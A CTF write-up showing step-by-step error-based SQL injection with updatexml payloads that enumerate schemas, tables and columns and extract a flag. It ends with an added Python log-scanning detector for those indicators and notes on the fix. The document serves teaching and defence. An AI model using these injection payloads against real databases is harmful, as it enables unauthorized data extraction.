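Challenge description:
We enter 1
and the query succeeds.
Next we try entering 1`
The application returns the database error message, which points to the ` as the location of the error.
We then use the SQL function updatexml to run queries whose results come back in the error message: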
-1 union select updatexml(1,concat('~', substr((select group_concat(schema_name) from information_schema.schemata),1,31) ),1)
-1 union select updatexml(1,concat('~', substr((select group_concat(schema_name) from information_schema.schemata),30,31) ),1)
The database name is sqli
Query the table names
-1 union select updatexml(1,concat('~', substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),1,31) ),1)
Query the column names
-1 union select updatexml(1,concat('~', substr((select group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'),1,31) ),1)
Query the field values
-1 union select updatexml(1,concat('~', substr((select group_concat(flag) from flag),1,31) ),1)
-1 union select updatexml(1,concat('~', substr((select group_concat(flag) from flag),20,31) ),1)
This gives the flag
ctfhub{455aa3bdb68aebab7571a24c}
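
A detection-side view of the requests above, as an added example that is not part of the original writeup: a Python scan of web access logs for the updatexml, information_schema and union select indicators that these payloads contain. The log format, the id parameter name, the client address and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators taken from the payloads in this writeup.
INDICATORS = [
    # updatexml() raises an XPath error whose text echoes the concat() argument
    ("xpath-error-function", re.compile(r"\bupdatexml\s*\(", re.I)),
    # metadata enumeration (schemata, tables, columns)
    ("information_schema", re.compile(r"\binformation_schema\s*\.", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
# Assumed log layout: common log format with the client address first.
REQUEST = re.compile(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP')


def score_value(value):
    """Return the names of all indicators found in one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def scan_access_log(lines):
    """Yield (client, parameter, indicators) for each suspicious request."""
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes values and turns '+' into a space
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = score_value(value)
            if hits:
                yield client, name, hits


# Constructed sample log lines (not taken from the challenge server).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /?id=-1+union+select+updatexml(1,concat(%27~%27,(select+1)),1) HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Jan/2024:10:00:20 +0000] '
    '"GET /?id=-1+union+select+table_name+from+information_schema.tables HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for client, param, hits in scan_access_log(SAMPLE_LOG):
        print(client, param, ",".join(hits))
```

Pattern matching of this kind only surfaces the requests for review; the underlying fix is a parameterized query and not returning raw database errors to the client.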